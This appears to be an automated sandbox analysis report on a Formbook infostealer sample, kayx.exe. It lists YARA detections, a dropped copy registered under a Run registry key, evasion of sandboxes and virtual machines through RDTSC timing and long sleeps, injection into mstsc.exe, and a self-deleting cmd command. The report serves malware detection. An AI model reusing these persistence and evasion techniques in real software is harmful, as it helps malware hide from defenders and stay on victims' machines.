Source: kayx.exe, 00000011.00000000.350990783.0000000000468000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000011.00000002.397835707.0000000002C23000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamemstsc.exej% vs kayx.exe
Source: kayx.exe Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Yara signature match
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: kayx.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: firefoxe.exe.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: kayx.exe, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: firefoxe.exe.1.dr, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.0.kayx.exe.ec0000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.kayx.exe.ec0000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.kayx.exe.200000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.0.kayx.exe.200000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 16.0.kayx.exe.2c0000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.kayx.exe.2c0000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 17.0.kayx.exe.400000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 19.0.firefoxe.exe.9a0000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 19.2.firefoxe.exe.9a0000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.evad.winEXE@14/3@4/2
Source: C:\Users\user\Desktop\kayx.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_01
Source: kayx.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\kayx.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: kayx.exe Virustotal: Detection: 34%
Source: kayx.exe ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\kayx.exe File read: C:\Users\user\Desktop\kayx.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\kayx.exe 'C:\Users\user\Desktop\kayx.exe'
Source: unknown Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: unknown Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: unknown Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
Source: unknown Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kayx.exe Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe' Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03C036F1-A186-11D0-824A-00AA005B4383}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: kayx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: kayx.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000012.00000000.376957565.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: kayx.exe, 00000011.00000003.351692207.0000000000AB0000.00000004.00000001.sdmp, mstsc.exe, 00000015.00000002.486610265.0000000004CAF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: kayx.exe, mstsc.exe, 00000015.00000002.486610265.0000000004CAF000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdbGCTL source: kayx.exe, 00000011.00000002.397529833.0000000002B00000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdb source: kayx.exe, 00000011.00000002.397529833.0000000002B00000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000012.00000000.376957565.000000000E1C0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\kayx.exe Unpacked PE file: 17.2.kayx.exe.400000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_0185A9A1 push edx; iretd 1_2_0185A9A2
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C48CE3 push E808AB5Eh; retf 1_2_05C48D01
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C48C8D push E808AB5Eh; retf 1_2_05C48D01
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041AD55 push eax; ret 17_2_0041ADA8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041ADA2 push eax; ret 17_2_0041ADA8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041ADAB push eax; ret 17_2_0041AE12
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041AE0C push eax; ret 17_2_0041AE12
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00414EC5 push CFF27278h; ret 17_2_00414EC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00414E85 push CFF27278h; ret 17_2_00414EC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00414740 push cs; iretd 17_2_00414779
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041478D push cs; iretd 17_2_00414779
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E5D0D1 push ecx; ret 17_2_00E5D0E4
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041AD55 push eax; ret 17_1_0041ADA8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041ADA2 push eax; ret 17_1_0041ADA8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041ADAB push eax; ret 17_1_0041AE12
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041AE0C push eax; ret 17_1_0041AE12
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00414EC5 push CFF27278h; ret 17_1_00414EC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00414E85 push CFF27278h; ret 17_1_00414EC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00414740 push cs; iretd 17_1_00414779
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041478D push cs; iretd 17_1_00414779
Source: initial sample Static PE information: section name: .text entropy: 7.94131868162
Source: initial sample Static PE information: section name: .text entropy: 7.94131868162

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\kayx.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Jump to dropped file

Boot Survival:

barindex
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\kayx.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefoxe Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefoxe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: kayx.exe, 00000001.00000002.355951256.0000000005BC0000.00000004.00000001.sdmp, firefoxe.exe, 00000013.00000002.488821328.0000000005540000.00000004.00000001.sdmp, firefoxe.exe, 00000014.00000002.485995375.00000000036F1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLHEAD%YCLYIDUONHMGOW.VBSKCREATEOBJECT("WSCRIPT.SHELL").RUN """
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\kayx.exe RDTSC instruction interceptor: First address: 00000000004083C4 second address: 00000000004083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kayx.exe RDTSC instruction interceptor: First address: 000000000040875E second address: 0000000000408764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 0000000002F083C4 second address: 0000000002F083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 0000000002F0875E second address: 0000000002F08764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00408690 rdtsc 17_2_00408690
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\kayx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\kayx.exe TID: 6564 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
